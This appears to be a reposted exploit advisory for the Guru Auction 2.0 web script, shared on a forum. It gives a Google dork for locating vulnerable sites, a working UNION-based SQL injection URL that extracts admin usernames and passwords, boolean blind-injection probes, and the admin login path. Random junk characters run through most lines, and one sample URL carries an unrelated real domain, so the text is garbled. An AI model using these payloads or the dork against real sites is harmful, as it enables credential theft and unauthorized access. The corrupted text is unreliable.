Guru Auction 2.0 Multiple SQL Injection Vulnerabilities) c8 N) g1 `- m) W
2 z& y H# l# n- U+ Q5 j C8 X
作者 : v3n0m
8 q# s3 w$ G: Y: D _1 w9 ?应用 : Guru Auction 2.0
2 g+ b7 c9 n% C1 i7 @) h& MPrice : $49
& A _1 ^& S; J; PVendor : http://www.guruscript.com/
7 U- ]* Z( D" J, VGoogle Dork : inurl:subcat.php?cate_id=' X9 }. W& L* X5 ` ~
- J& K9 x! F( N, D9 Z( c2 Y% rSQLi p0c:! ^. B: g7 t7 E/ }% H
~~~~~~~~~~
/ ^) m9 Y( G3 i. l" s' l+ V8 Yhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
" ^/ \" C4 ^9 m- e% T4 Z4 [ 3 \# l9 T4 C' e2 {" D
. q7 `# J' u" f$ s9 C% X
盲注 p0c:
0 F8 h$ M; o2 Q& w9 W~~~~~~~~~~2 N( q) w$ [# b/ M4 |
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
+ Y: U! Y% ` v8 |http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
7 |* f0 H1 K5 |6 ?* L& ]
# g" u: c- S5 k) U2 I! ]! b+ u- J管理登录入口:! c% I8 n2 K. O0 s" g
~~~~~~~~~~( u( L. b4 {0 r4 G& I$ @9 _. \
http://domain.tld/[path]/admin/$ P$ b5 R3 d& v5 ~9 f" y
|
发表于 2012-12-31 09:24:05
收藏
支持
反对